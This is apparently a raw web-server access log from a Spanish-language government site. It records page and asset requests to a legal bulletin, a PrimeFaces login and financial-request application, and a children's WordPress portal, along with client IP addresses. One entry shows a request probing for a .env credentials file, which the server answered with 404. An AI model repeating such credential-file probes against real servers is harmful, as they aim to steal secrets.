181.61.0.51 - - [02/Oct/2022:19:27:20 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1+kRx4V0ja8HV9u8ZbD+2CcVWVrh3zXeWM=&y=U2FsdGVkX19XZB1oW/zoaw9tkGErjm5OUA51Beb8cXs7fBheRkGIAEevWRd2Sw+X HTTP/1.1" 200 25
181.61.0.51 - - [02/Oct/2022:19:27:20 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19WepUyNFfktXADPgXYJ1Xp8wRD/0qB7a0wOMyc573+YaPZ2ztPEwCXk/kUWFavUsg4XVQAechgHEiiXyFn2eVw+L1DzdodKqgyFCam8g5V2RWl3uVXfU5VlC508CnQX0UXt8dnj1V36sSrLvZAHksqYmkfAc8Vllc=&u=U2FsdGVkX1+kRx4V0ja8HV9u8ZbD+2CcVWVrh3zXeWM=&y=U2FsdGVkX19XZB1oW/zoaw9tkGErjm5OUA51Beb8cXs7fBheRkGIAEevWRd2Sw+X HTTP/1.1" 200 25
181.61.0.51 - - [02/Oct/2022:19:27:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+sMYsGYRt6M0am8jv24nahcjOv1pN0YDE19zQVR5vZTzaAmRWmRF+L3xmAWqlsJWggcH5aMDnlJa37ZPx5fo3I51jitA9bO0CymEvd6D0oDGpfJiZO7hfecEPab0ktqH8vdjpAAsol6GLFQVh0w0ph2kMhHTerSK4=&u=U2FsdGVkX1+kRx4V0ja8HV9u8ZbD+2CcVWVrh3zXeWM=&y=U2FsdGVkX19XZB1oW/zoaw9tkGErjm5OUA51Beb8cXs7fBheRkGIAEevWRd2Sw+X HTTP/1.1" 200 25
181.61.0.51 - - [02/Oct/2022:19:27:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/H/HYmEYEvfa1Xt1OsvK3OJmkNZHusAg274oRyQMPDZQe/5FEdq896eD7SnSSk0cj1H8fW/5ALrVj+4KGlASVuckLYUPGRQXrdfiYgM4mU5XzbqWcQubsspmBUz4pEXQBDtu0zMBzeyYT18RiEFJIxCm6XTT5t4/o=&u=U2FsdGVkX1+kRx4V0ja8HV9u8ZbD+2CcVWVrh3zXeWM=&y=U2FsdGVkX19XZB1oW/zoaw9tkGErjm5OUA51Beb8cXs7fBheRkGIAEevWRd2Sw+X HTTP/1.1" 200 25
181.61.0.51 - - [02/Oct/2022:19:27:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/ckIS6fSMQ1zziGTbpXD+89tJp5I5bOrZlniJ6JC23TPOC2RkKH1Tjue2D8E061x3/1FktffG4ywmsDgiWS9a1PX9vNoRUUddBakijMHY5xgxiBj2rShiEVSmze29mInNqAYtMwUBCKNQ9U24RsRVi4od3SdYYYOmBY+7UPDoLiWLR7BzRmWYm&u=U2FsdGVkX1+kRx4V0ja8HV9u8ZbD+2CcVWVrh3zXeWM=&y=U2FsdGVkX19XZB1oW/zoaw9tkGErjm5OUA51Beb8cXs7fBheRkGIAEevWRd2Sw+X HTTP/1.1" 200 25
216.245.221.92 - - [02/Oct/2022:19:27:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:19:26:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
201.245.192.253 - - [02/Oct/2022:19:28:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:19:27:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
95.108.213.41 - - [02/Oct/2022:19:30:50 -0500] "-" 408 -
66.249.64.17 - - [02/Oct/2022:19:31:03 -0500] "-" 408 -
186.80.52.211 - - [02/Oct/2022:19:31:32 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.80.52.211 - - [02/Oct/2022:19:31:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12180
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.80.52.211 - - [02/Oct/2022:19:31:36 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
186.80.52.211 - - [02/Oct/2022:19:31:39 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2221
186.80.52.211 - - [02/Oct/2022:19:31:39 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:40 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16232
186.80.52.211 - - [02/Oct/2022:19:31:40 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
186.80.52.211 - - [02/Oct/2022:19:31:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:40 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
186.80.52.211 - - [02/Oct/2022:19:31:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:41 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.80.52.211 - - [02/Oct/2022:19:31:41 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
186.80.52.211 - - [02/Oct/2022:19:31:41 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
186.80.52.211 - - [02/Oct/2022:19:31:43 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [02/Oct/2022:19:31:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44945
186.80.52.211 - - [02/Oct/2022:19:31:45 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.80.52.211 - - [02/Oct/2022:19:31:46 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 65677
186.80.52.211 - - [02/Oct/2022:19:31:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.211 - - [02/Oct/2022:19:31:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Oct/2022:19:31:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44333
186.80.52.211 - - [02/Oct/2022:19:31:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.80.52.211 - - [02/Oct/2022:19:32:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31922
207.46.13.40 - - [02/Oct/2022:19:32:47 -0500] "GET /BLA/resoluciones/AUTOS%202022/3811.pdf HTTP/1.1" 200 395199
216.245.221.92 - - [02/Oct/2022:19:32:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:19:31:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:19:33:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:19:32:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
207.46.13.40 - - [02/Oct/2022:19:35:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/1813.tif HTTP/1.1" 200 277044
172.22.2.4 - - [02/Oct/2022:19:34:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63207
157.55.39.25 - - [02/Oct/2022:19:37:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/00001061.tif HTTP/1.1" 200 139574
216.245.221.92 - - [02/Oct/2022:19:37:56 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:19:38:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:19:38:37 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [02/Oct/2022:19:38:46 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [02/Oct/2022:19:37:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:19:37:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
87.250.224.69 - - [02/Oct/2022:19:40:50 -0500] "-" 408 -
201.245.192.253 - - [02/Oct/2022:19:41:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44945
201.245.192.253 - - [02/Oct/2022:19:41:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44333
66.249.64.214 - - [02/Oct/2022:19:41:56 -0500] "-" 408 -
173.252.95.6 - - [02/Oct/2022:19:42:16 -0500] "GET /bogota-ya-cuenta-mas-de-70-negocios-verdes-verificados.html HTTP/1.1" 206 992
172.22.2.4 - - [02/Oct/2022:19:42:26 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
216.245.221.92 - - [02/Oct/2022:19:42:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:19:42:28 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [02/Oct/2022:19:43:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
181.56.93.102 - - [02/Oct/2022:19:44:09 -0500] "GET /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
181.56.93.102 - - [02/Oct/2022:19:44:09 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12180
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
181.56.93.102 - - [02/Oct/2022:19:44:10 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
181.56.93.102 - - [02/Oct/2022:19:44:11 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.56.93.102 - - [02/Oct/2022:19:44:11 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:12 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12180
181.56.93.102 - - [02/Oct/2022:19:44:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:16 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2224
181.56.93.102 - - [02/Oct/2022:19:44:16 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:17 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:17 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16253
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
181.56.93.102 - - [02/Oct/2022:19:44:18 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
181.56.93.102 - - [02/Oct/2022:19:44:20 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:20 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9754
181.56.93.102 - - [02/Oct/2022:19:44:22 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
181.56.93.102 - - [02/Oct/2022:19:44:23 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 45390
181.56.93.102 - - [02/Oct/2022:19:44:24 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.93.102 - - [02/Oct/2022:19:44:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1468
172.22.2.4 - - [02/Oct/2022:19:42:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.84.22.233 - - [02/Oct/2022:19:45:02 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
186.84.22.233 - - [02/Oct/2022:19:45:02 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
186.84.22.233 - - [02/Oct/2022:19:45:02 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
186.84.22.233 - - [02/Oct/2022:19:45:02 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
186.84.22.233 - - [02/Oct/2022:19:45:02 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
186.84.22.233 - - [02/Oct/2022:19:45:00 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89596
186.84.22.233 - - [02/Oct/2022:19:45:02 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
186.84.22.233 - - [02/Oct/2022:19:45:02 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
186.84.22.233 - - [02/Oct/2022:19:45:02 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
186.84.22.233 - - [02/Oct/2022:19:45:02 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
